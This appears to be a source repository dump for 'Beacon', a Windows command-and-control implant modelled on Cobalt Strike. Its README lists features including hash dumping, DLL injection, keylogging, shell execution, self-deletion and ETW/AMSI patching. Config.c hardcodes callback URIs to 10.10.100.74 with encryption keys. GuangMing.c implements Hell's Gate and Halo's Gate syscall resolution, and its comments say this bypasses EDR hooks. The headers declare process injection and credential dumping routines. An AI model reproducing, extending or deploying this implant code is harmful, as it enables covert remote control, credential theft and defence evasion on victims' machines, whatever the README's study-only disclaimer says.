├── ceshi ├── stdafx.h ├── ce.c ├── ceshi.vcxproj.filters └── ceshi.vcxproj ├── Beacon ├── Bof.c ├── File.c ├── Http.c ├── Job.c ├── Util.h ├── util.c ├── Beacon.c ├── Command.c ├── Patch.c ├── Shell.c ├── MetaData.c ├── libcrypto.lib ├── InjectProcess.c ├── CmdExecuteAssembly.c ├── Job.h ├── Config.h ├── Http.h ├── Config.c ├── MetaData.h ├── Beacon.vcxproj.filters ├── Bof.h ├── GuangMing.c ├── Command.h ├── bcookesHalosGate.asm ├── Beacon.vcxproj ├── ntdef.h ├── GuangMing.h └── DunpHash.c ├── README.md ├── Beacon.sln ├── .gitattributes └── .gitignore /ceshi/stdafx.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | -------------------------------------------------------------------------------- /ceshi/ce.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M0nster3/Beacon/HEAD/ceshi/ce.c -------------------------------------------------------------------------------- /Beacon/Bof.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M0nster3/Beacon/HEAD/Beacon/Bof.c -------------------------------------------------------------------------------- /Beacon/File.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M0nster3/Beacon/HEAD/Beacon/File.c -------------------------------------------------------------------------------- /Beacon/Http.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M0nster3/Beacon/HEAD/Beacon/Http.c -------------------------------------------------------------------------------- /Beacon/Job.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M0nster3/Beacon/HEAD/Beacon/Job.c -------------------------------------------------------------------------------- /Beacon/Util.h: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/M0nster3/Beacon/HEAD/Beacon/Util.h -------------------------------------------------------------------------------- /Beacon/util.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M0nster3/Beacon/HEAD/Beacon/util.c -------------------------------------------------------------------------------- /Beacon/Beacon.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M0nster3/Beacon/HEAD/Beacon/Beacon.c -------------------------------------------------------------------------------- /Beacon/Command.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M0nster3/Beacon/HEAD/Beacon/Command.c -------------------------------------------------------------------------------- /Beacon/Patch.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M0nster3/Beacon/HEAD/Beacon/Patch.c -------------------------------------------------------------------------------- /Beacon/Shell.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M0nster3/Beacon/HEAD/Beacon/Shell.c -------------------------------------------------------------------------------- /Beacon/MetaData.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M0nster3/Beacon/HEAD/Beacon/MetaData.c -------------------------------------------------------------------------------- /Beacon/libcrypto.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M0nster3/Beacon/HEAD/Beacon/libcrypto.lib -------------------------------------------------------------------------------- 
/Beacon/InjectProcess.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M0nster3/Beacon/HEAD/Beacon/InjectProcess.c -------------------------------------------------------------------------------- /Beacon/CmdExecuteAssembly.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M0nster3/Beacon/HEAD/Beacon/CmdExecuteAssembly.c -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Beacon 2 | 3 | 郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担。 4 | 5 | ## 0x01、介绍 6 | 7 | 作者:[Monster3](https://github.com/M0nster3) 8 | 9 | 以后不主要搞安全了,把之前搞得一些东西放出来,大家可以参考参考。 10 | 11 | ## 0x02、实现的一些功能 12 | 13 | 目前实现修改过的 dump hash ,dll 注入功能,键盘记录,joblist,jobkill,Bof 加载,net 内存加载,shell,run、文件操作相应的功能,sleep,获取主机目录,还有自删除以及 patch ETW,patch Amsi 还添加了光明之门等功能。 14 | 15 | 可能有一些bug,师傅们看的自己修改一下 16 | 17 | -------------------------------------------------------------------------------- /Beacon/Job.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "Command.h" 3 | typedef struct { 4 | HANDLE hReadPipe; 5 | STARTUPINFO si; 6 | HANDLE hWritePipe; 7 | } CreatePipeJob; 8 | 9 | CreatePipeJob createjob(); 10 | 11 | 12 | BeaconJob* Add_Beacon_0Job(HANDLE hProcess, HANDLE hThread, int dwProcessId, int dwThreadId, HANDLE hReadPipe, HANDLE hWritePipe, const char* jobname); 13 | void beacon_jobs(); 14 | void KEYLOGGEJob(int FlagsAndAttributes, char* Taskdata, int Task_size, int lasting); 15 | void BeaconFormatPrintf(formatp* format, char* fmt, ...); 16 | void beacon_JobKill(char* Taskdata, int Task_size); -------------------------------------------------------------------------------- /Beacon/Config.h: -------------------------------------------------------------------------------- 1 | 
#pragma once 2 | #include 3 | #include 4 | #include 5 | unsigned char* metadata_prepend; 6 | unsigned char* metadata_header; 7 | extern const char Http_get_uri[]; 8 | extern const char Http_Post_uri[]; 9 | unsigned char* Http_post_id_prepend; 10 | unsigned char* Http_post_id_append; 11 | unsigned char* Http_post_client_output_prepend; 12 | unsigned char* Http_post_client_output_append; 13 | extern unsigned char* pub_key_str; 14 | unsigned char* Response_prepend; 15 | unsigned char* Response_append; 16 | unsigned char IV[]; 17 | int SleepTime; 18 | unsigned char AESRandaeskey[16]; 19 | unsigned char Hmackey[16]; 20 | int Counter; 21 | int clientID; -------------------------------------------------------------------------------- /Beacon/Http.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | typedef struct { 9 | size_t respsize; 10 | unsigned char* resqresult; 11 | int code; 12 | }perform_requestresult; 13 | 14 | perform_requestresult perform_get_request(unsigned char* url, struct curl_slist* headers); 15 | unsigned char* parseGetResponse(unsigned char* data, size_t dataSize, size_t* responsedatalen); 16 | unsigned char* parsePacket(unsigned char* decryptedBuf, uint32_t* totalLen, uint32_t* commandType, size_t* commandBuflen , size_t* jia,int* jiaci); 17 | perform_requestresult perform_post_request(unsigned char* url, struct curl_slist* headers, const char* postData); -------------------------------------------------------------------------------- /Beacon/Config.c: -------------------------------------------------------------------------------- 1 | #include "Config.h" 2 | #include 3 | 4 | const char Http_get_uri[] = "http://10.10.100.74:80/www/handle/doc"; 5 | const char Http_Post_uri[] = "http://10.10.100.74:80/IMXo"; 6 | unsigned char* pub_key_str ="-----BEGIN PUBLIC KEY-----\n" 7 | 
"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCTWvb4Msb5iR3d+0DbOnj1HJ1ewGTxZgCyCxqT\n" 8 | "-----END PUBLIC KEY-----\n"; 9 | 10 | unsigned char* metadata_prepend = "SESSIONID="; 11 | unsigned char* metadata_header = "Cookie:"; //ÔÚprofileÖв»ÓüÓ:ºÅ 12 | unsigned char* Response_prepend = "data="; 13 | unsigned char* Response_append = "%%"; 14 | unsigned char* Http_post_id_prepend = "user="; 15 | unsigned char* Http_post_id_append = "%%"; 16 | unsigned char* Http_post_client_output_prepend = "data="; 17 | unsigned char* Http_post_client_output_append = "%%"; 18 | unsigned char IV[] = "abcdefghijklmnop"; 19 | int SleepTime = 3000; 20 | int Counter = 0; 21 | -------------------------------------------------------------------------------- /ceshi/ceshi.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 源文件 20 | 21 | 22 | 23 | 24 | 头文件 25 | 26 | 27 | -------------------------------------------------------------------------------- /Beacon/MetaData.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #pragma warning(disable:4996) 19 | 20 | typedef struct { 21 | uint8_t* MakeMeta; 22 | size_t MakeMetaLen; 23 | } MakeMetaInfoResult; 24 | 25 | typedef struct { 26 | unsigned char* EncryMetadata; 27 | int EncryMetadataLen; 28 | } EncryMetadataResult; 29 | 30 | 31 | MakeMetaInfoResult MakeMetaInfo(); 32 
| EncryMetadataResult EncryMetadata(); 33 | bool IsHighPriv(); 34 | bool IsOSX64(); 35 | bool IsProcessX64(); 36 | int GetMetaDataFlag(); 37 | unsigned char* GetOSVersion(); 38 | uint32_t GetLocalIPInt(); 39 | char* GetComputerNameAsString(); 40 | char* GetUsername(); 41 | char* GetProcessName(); 42 | unsigned char* GetCodePageANSI(size_t* bytesWritten); 43 | unsigned char* GetCodePageOEM(size_t* bytesWritten); 44 | uint8_t* GetMagicHead(uint8_t* MagicHead); -------------------------------------------------------------------------------- /Beacon.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.6.33829.357 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Beacon", "Beacon\Beacon.vcxproj", "{191A6F50-AE83-44D1-8446-9AFB9A077A97}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {191A6F50-AE83-44D1-8446-9AFB9A077A97}.Debug|x64.ActiveCfg = Debug|x64 17 | {191A6F50-AE83-44D1-8446-9AFB9A077A97}.Debug|x64.Build.0 = Debug|x64 18 | {191A6F50-AE83-44D1-8446-9AFB9A077A97}.Debug|x86.ActiveCfg = Debug|Win32 19 | {191A6F50-AE83-44D1-8446-9AFB9A077A97}.Debug|x86.Build.0 = Debug|Win32 20 | {191A6F50-AE83-44D1-8446-9AFB9A077A97}.Release|x64.ActiveCfg = Release|x64 21 | {191A6F50-AE83-44D1-8446-9AFB9A077A97}.Release|x64.Build.0 = Release|x64 22 | {191A6F50-AE83-44D1-8446-9AFB9A077A97}.Release|x86.ActiveCfg = Release|Win32 23 | {191A6F50-AE83-44D1-8446-9AFB9A077A97}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 
28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {5E985E9E-A6D4-4AD8-9127-66D77FF25434} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. 
To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 
53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /Beacon/Beacon.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {c080beae-b605-4553-9fed-0d69133780cb} 18 | 19 | 20 | {5b78ffdf-c6a7-4564-a111-4330e03fe7f6} 21 | 22 | 23 | {4b192a07-2beb-49bf-9f1b-01107daae80f} 24 | 25 | 26 | 27 | 28 | 源文件 29 | 30 | 31 | 源文件\MetaData 32 | 33 | 34 | 源文件\Util 35 | 36 | 37 | 源文件 38 | 39 | 40 | 源文件 41 | 42 | 43 | 源文件\Command 44 | 45 | 46 | 源文件\Command 47 | 48 | 49 | 源文件\Command 50 | 51 | 52 | 源文件 53 | 54 | 55 | 源文件\Command 56 | 57 | 58 | 源文件\Command 59 | 60 | 61 | 源文件 62 | 63 | 64 | 源文件 65 | 66 | 67 | 源文件 68 | 69 | 70 | 源文件\Util 71 | 72 | 73 | 74 | 75 | 头文件 76 | 77 | 78 | 头文件 79 | 80 | 81 | 头文件 82 | 83 | 84 | 头文件 85 | 86 | 87 | 头文件 88 | 89 | 90 | 头文件 91 | 92 | 93 | 头文件 94 | 95 | 96 | 头文件 97 | 98 | 99 | 头文件 100 | 101 | 102 | 103 | 104 | 源文件 105 | 106 | 107 | -------------------------------------------------------------------------------- /Beacon/Bof.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "Util.h" 3 | 4 | 5 | typedef HMODULE(__stdcall* fpLoadLibraryA)(LPCSTR lpLibFileName); 6 | typedef 
BOOL(__stdcall* fpFreeLibrary)(HMODULE hLibModule); 7 | typedef FARPROC(__stdcall* fpGetProcAddress)(HMODULE hModule, LPCSTR lpProcName); 8 | typedef HMODULE(__stdcall* fpGetModuleHandleA)(LPCSTR lpModuleName); 9 | typedef void(__cdecl* fpBeaconDataParse)(formatp* parser, char* buffer, int size); 10 | typedef char* (__cdecl* fpBeaconDataPtr)(formatp* parser, int size); 11 | typedef int(__cdecl* fpBeaconDataInt)(formatp* parser); 12 | typedef short(__cdecl* fpBeaconDataShort)(formatp* parser); 13 | typedef int(__cdecl* fpBeaconDataLength)(formatp* parser); 14 | typedef char* (__cdecl* fpBeaconDataExtract)(formatp* parser, int* size); 15 | typedef void(__cdecl* fpBeaconFormatAlloc)(formatp* format, int maxsz); 16 | typedef void(__cdecl* fpBeaconFormatReset)(formatp* format); 17 | typedef void(__cdecl* fpBeaconFormatAppend)(formatp* format, char* text, int len); 18 | typedef void(__cdecl* fpBeaconFormatPrintf)(formatp* format, char* fmt, ...); 19 | typedef char* (__cdecl* fpBeaconFormatToString)(formatp* format, int* size); 20 | typedef void(__cdecl* fpBeaconFormatFree)(formatp* format); 21 | typedef void(__cdecl* fpBeaconFormatInt)(formatp* format, int value); 22 | typedef void(__cdecl* fpBeaconOutput)(int type, char* data, int len); 23 | typedef void(__cdecl* fpBeaconPrintf)(int type, char* fmt, ...); 24 | typedef void(__cdecl* fpBeaconErrorD)(int BeaconErrorsType, DWORD error_code); 25 | typedef void(__cdecl* fpBeaconErrorDD)(int BeaconErrorsType, int err_msg, u_long err_code_msg); 26 | typedef void(__cdecl* fpBeaconErrorNA)(int BeaconErrorsType); 27 | typedef BOOL(__cdecl* fpBeaconUseToken)(HANDLE token); 28 | typedef BOOL(__cdecl* fpBeaconIsAdmin)(); 29 | typedef void(__cdecl* fpBeaconRevertToken)(); 30 | typedef void(__cdecl* fpBeaconGetSpawnTo)(BOOL x86, char* buffer, int length); 31 | typedef void(__cdecl* fpBeaconInjectProcess)(HANDLE hProc, int pid, char* payload, int p_len, int p_offset, char* arg, int a_len); 32 | typedef void(__cdecl* 
fpBeaconInjectTemporaryProcess)(PROCESS_INFORMATION* pInfo, char* payload, int p_len, int p_offset, char* arg, int a_len); 33 | typedef BOOL(__cdecl* fpBeaconSpawnTemporaryProcess)(BOOL x86, BOOL ignoreToken, STARTUPINFOA* si, PROCESS_INFORMATION* pInfo); 34 | typedef void(__cdecl* fpBeaconCleanupProcess)(PROCESS_INFORMATION* pInfo); 35 | typedef BOOL(__cdecl* fptoWideChar)(char* src, wchar_t* dst, unsigned int max); 36 | 37 | typedef struct { 38 | fpLoadLibraryA LoadLibraryA; 39 | fpFreeLibrary FreeLibrary; 40 | fpGetProcAddress GetProcAddress; 41 | fpGetModuleHandleA GetModuleHandleA; 42 | fpBeaconDataParse BeaconDataParse; 43 | fpBeaconDataPtr BeaconDataPtr; 44 | fpBeaconDataInt BeaconDataInt; 45 | fpBeaconDataShort BeaconDataShort; 46 | fpBeaconDataLength BeaconDataLength; 47 | fpBeaconDataExtract BeaconDataExtract; 48 | fpBeaconFormatAlloc BeaconFormatAlloc; 49 | fpBeaconFormatReset BeaconFormatReset; 50 | fpBeaconFormatAppend BeaconFormatAppend; 51 | fpBeaconFormatPrintf BeaconFormatPrintf; 52 | fpBeaconFormatToString BeaconFormatToString; 53 | fpBeaconFormatFree BeaconFormatFree; 54 | fpBeaconFormatInt BeaconFormatInt; 55 | fpBeaconOutput BeaconOutput; 56 | fpBeaconPrintf BeaconPrintf; 57 | fpBeaconErrorD BeaconErrorD; 58 | fpBeaconErrorDD BeaconErrorDD; 59 | fpBeaconErrorNA BeaconErrorNA; 60 | fpBeaconUseToken BeaconUseToken; 61 | fpBeaconRevertToken BeaconRevertToken; 62 | fpBeaconIsAdmin BeaconIsAdmin; 63 | fpBeaconGetSpawnTo BeaconGetSpawnTo; 64 | fpBeaconInjectProcess BeaconInjectProcess; 65 | fpBeaconInjectTemporaryProcess BeaconInjectTemporaryProcess; 66 | fpBeaconSpawnTemporaryProcess BeaconSpawnTemporaryProcess; 67 | fpBeaconCleanupProcess BeaconCleanupProcess; 68 | fptoWideChar toWideChar; 69 | char* end; 70 | 71 | }BeaconInternalFunctions; 72 | 73 | typedef struct 74 | { 75 | short Type; 76 | short id; 77 | int offset; 78 | int OffsetInSection; 79 | }BeaconBofRelocation; 
-------------------------------------------------------------------------------- /Beacon/GuangMing.c: -------------------------------------------------------------------------------- 1 | /* 2 | Author: Bobby Cooke @0xBoku | https://github.com/boku7 | https://0xBoku.com | https://www.linkedin.com/in/bobby-cooke/ 3 | Credits / References: Pavel Yosifovich (@zodiacon),Reenz0h from @SEKTOR7net, @smelly__vx & @am0nsec ( Creators/Publishers of the Hells Gate technique) 4 | */ 5 | #include 6 | #include "GuangMing.h" 7 | #include 8 | 9 | 10 | PVOID ntdll = NULL; 11 | PVOID ntdllExportTable = NULL; 12 | 13 | PVOID ntdllExAddrTbl = NULL; 14 | PVOID ntdllExNamePtrTbl = NULL; 15 | PVOID ntdllExOrdinalTbl = NULL; 16 | 17 | const char SyscallString[] = "NtAllocateVirtualMemory"; 18 | DWORD SyscallLen = 0; 19 | PVOID SyscallAddr = NULL; 20 | DWORD SyscallNumber = 0; 21 | 22 | 23 | 24 | SYSTEM_PROCESS_INFORMATION* procinfo; 25 | 26 | DWORD GetSyscallNumber(char* Page, int SyscallLen) { 27 | char SyscallString[32]; 28 | memcpy(SyscallString, Page, SyscallLen); 29 | SyscallString[SyscallLen] = '\0'; 30 | printf("###################################################################\r\n"); 31 | // Use Position Independent Shellcode to resolve the address of NTDLL and its export tables 32 | ntdll = getntdll(); 33 | printf("[+] %p : NTDLL Base Address\r\n", ntdll); 34 | 35 | ntdllExportTable = getExportTable(ntdll); 36 | printf("[+] %p : NTDLL Export Table Address\r\n", ntdllExportTable); 37 | 38 | ntdllExAddrTbl = getExAddressTable(ntdllExportTable, ntdll); 39 | printf("[+] %p : NTDLL Export Address Table Address\r\n", ntdllExAddrTbl); 40 | 41 | ntdllExNamePtrTbl = getExNamePointerTable(ntdllExportTable, ntdll); 42 | printf("[+] %p : NTDLL Export Name Pointer Table Address\r\n", ntdllExNamePtrTbl); 43 | 44 | ntdllExOrdinalTbl = getExOrdinalTable(ntdllExportTable, ntdll); 45 | printf("[+] %p : NTDLL Export Ordinal Table Address\r\n", ntdllExOrdinalTbl); 46 | 
printf("###################################################################\r\n\r\n"); 47 | // Find the address of NTDLL.NtQuerySystemInformation by looping through NTDLL export tables 48 | //SyscallLen = strl(SyscallString); 49 | printf("[-] Looping through NTDLL Export tables to discover the address for NTDLL.%s..\r\n", SyscallString); 50 | SyscallAddr = getApiAddr( 51 | SyscallLen, 52 | SyscallString, 53 | ntdll, 54 | ntdllExAddrTbl, 55 | ntdllExNamePtrTbl, 56 | ntdllExOrdinalTbl 57 | ); 58 | printf("[+] %p : NTDLL.%s Address\r\n\r\n", SyscallAddr, SyscallString); 59 | printf("[-] Using HellsGate technique to discover syscall for %s..\r\n", SyscallString); 60 | 61 | SyscallNumber = findSyscallNumber(SyscallAddr); 62 | // HalosGate technique to recover the systemcall number. Used when stub in NTDLL is hooked. This evades/bypasses EDR Userland hooks 63 | if (SyscallNumber == 0) { 64 | printf("[!] Failed to discover the syscall number for . The API is likely hooked by EDR\r\n"); 65 | printf("[-] Using HalosGate technique to discover syscall for ..\r\n"); 66 | DWORD index = 0; 67 | while (SyscallNumber == 0) { 68 | index++; 69 | // Check for unhooked Sycall Above the target stub 70 | SyscallNumber = halosGateUp(SyscallAddr, index); 71 | if (SyscallNumber) { 72 | SyscallNumber = SyscallNumber - index; 73 | break; 74 | } 75 | // Check for unhooked Sycall Below the target stub 76 | SyscallNumber = halosGateDown(SyscallAddr, index); 77 | if (SyscallNumber) { 78 | SyscallNumber = SyscallNumber + index; 79 | break; 80 | } 81 | } 82 | } 83 | 84 | 85 | // Allocate the buffer for the process information returned from NtQuerySystemInformation 86 | //ULONG size = 1 << 18; 87 | //PVOID base_addr = NULL; 88 | //SIZE_T buffSize1 = (SIZE_T)size; 89 | //ULONG required = 0; 90 | 91 | // NtAllocateVirtualMemory 92 | 93 | return SyscallNumber; 94 | //// NtQuerySystemInformation 95 | //HellsGate(ntQrySysInfoSyscallNumber); 96 | 97 | //NTSTATUS status = 
HellDescent(SystemProcessInformation, base_addr, size, &required); 98 | 99 | //if (status == STATUS_BUFFER_TOO_SMALL) { 100 | // size = required + (1 << 14); 101 | // SIZE_T buffSize2 = size; 102 | // // NtAllocateVirtualMemory 103 | // HellsGate(SyscallNumber); 104 | // HellDescent((HANDLE)-1, &base_addr, 0, &buffSize2, MEM_COMMIT | MEM_RESERVE, SyscallString_READWRITE); 105 | //} 106 | 107 | //NTSTATUS status2 = HellDescent(SystemProcessInformation, base_addr, size, &required); 108 | 109 | //procinfo = (SYSTEM_PROCESS_INFORMATION*)base_addr; 110 | //while (TRUE) { 111 | // BOOL check = compExplorer(procinfo->ImageName.Buffer); 112 | // if (check == 1) { 113 | // printf("%ws | PID: %6u | PPID: %6u\n", 114 | // procinfo->ImageName.Buffer, 115 | // HandleToULong(procinfo->UniqueProcessId), 116 | // HandleToULong(procinfo->InheritedFromUniqueProcessId) 117 | // ); 118 | // break; 119 | // } 120 | // procinfo = (SYSTEM_PROCESS_INFORMATION*)((BYTE*)procinfo + procinfo->NextEntryOffset); 121 | //} 122 | //return; 123 | } -------------------------------------------------------------------------------- /ceshi/ceshi.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {e627f4de-5f33-4d18-bb6d-1c3d0f709423} 25 | ceshi 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | Level3 76 | true 77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 78 | true 79 | 80 | 81 | Console 82 | true 83 | 84 | 85 | 86 | 87 | Level3 88 | true 89 | true 90 | 
true 91 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | 94 | 95 | Console 96 | true 97 | true 98 | true 99 | 100 | 101 | 102 | 103 | Level3 104 | true 105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 106 | true 107 | 108 | 109 | Console 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | true 118 | true 119 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 120 | true 121 | 122 | 123 | Console 124 | true 125 | true 126 | true 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | -------------------------------------------------------------------------------- /Beacon/Command.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include "Config.h" 15 | #include "Util.h" 16 | #include "Bof.h"; 17 | 18 | typedef struct { 19 | int JobNumber; 20 | HANDLE pHandle; 21 | HANDLE hThread; 22 | int dwProcessId; 23 | int dwThreadId; 24 | HANDLE hReadPipe; 25 | HANDLE hWritePipe; 26 | struct BeaconJob* Linked; 27 | BOOL state; 28 | BOOL kill; 29 | int JobProcessPid; 30 | int JobType; 31 | short lasting; 32 | char JobName[64]; 33 | }BeaconJob; 34 | void SleepTimes(unsigned char* Buf); 35 | unsigned char* CmdFileBrowse(unsigned char* commandBuf, size_t* lenn); 36 | void DataProcess(unsigned char* buf, size_t lenn, int callback); 37 | 38 | unsigned char* parseUpload(unsigned char* commandBuf, size_t* commandBuflen, size_t* lenn, int chunkNumber); 39 | unsigned char* CmdDrives(unsigned char* commandBuf, size_t* commandBuflen); 40 | unsigned char* cmdMkdir(unsigned char* cmdBuf, size_t* commandBuflen, size_t* Bufflen); 41 | unsigned char* fileRemove(unsigned char* cmdBuf, size_t* commandBuflen, size_t* Bufflen); 42 | unsigned char* Download(unsigned char* buf, size_t* commandBuflen, size_t* Bufflen); 43 | unsigned char* 
Cmdshell(unsigned char* buf, size_t* commandBuflen, size_t* Bufflen); 44 | 45 | void __cdecl BeaconBof(unsigned char* buf, size_t* commandBuflen, size_t* Bufflen); 46 | //unsigned char* EXECUTE_ASSEMBLY(unsigned char* buf, size_t* commandBuflen, size_t* Bufflen); 47 | //unsigned char* EXECUTE_ASSEMBLY(unsigned char* Taskdata, size_t* Task_size, int x86, int ignoreToken); 48 | unsigned char* EXECUTE_ASSEMBLY(unsigned char* buf, size_t* commandBuflen, size_t* Bufflen); 49 | void PipeJob(unsigned char* buf, size_t* commandBuflen, size_t* Bufflen); 50 | 51 | void ProcessInject(int pid, PROCESS_INFORMATION* pi, HANDLE hProcess, char* payload, size_t p_len, int p_offset, char* arg, int a_len); 52 | BeaconJob* Add_Beacon_0Job(HANDLE hProcess, HANDLE hThread, int dwProcessId, int dwThreadId, HANDLE hReadPipe, HANDLE hWritePipe, const char* jobname); 53 | void CheckTimeout(HANDLE hNamedPipe, int timeout); 54 | 55 | 56 | void beacon_ps(char* Taskdata, int Task_size); 57 | int DumpHASH(); 58 | 59 | int Is_Wow64(HANDLE hProcess); 60 | int BeaconFormatlength(formatp* format); 61 | void BeaconFormatFree(formatp* format); 62 | void BeaconFormatAlloc(formatp* format, int maxsz); 63 | void BeaconFormatInit(formatp* format, char* buff, int buffsize); 64 | void BeaconFormatPrintf(formatp* format, char* fmt, ...); 65 | void BeaconDataParse(datap* parser, char* buffer, int size); 66 | char* BeaconDataPtr(datap* parser, int size); 67 | char* BeaconDataPtr2(datap* parser); 68 | int BeaconDataInt(datap* parser); 69 | short BeaconDataShort(datap* parser); 70 | int BeaconDataLength(datap* parser); 71 | char* BeaconDataExtract(datap* parser, int* outsize); 72 | void BeaconFormatReset(formatp* format); 73 | void BeaconFormatAppend(formatp* format, char* text, int len); 74 | char* BeaconFormatToString(formatp* format, int* size); 75 | void BeaconFormatInt(formatp* format, int value); 76 | void BeaconErrorNA(); 77 | void BeaconErrorDD(); 78 | void 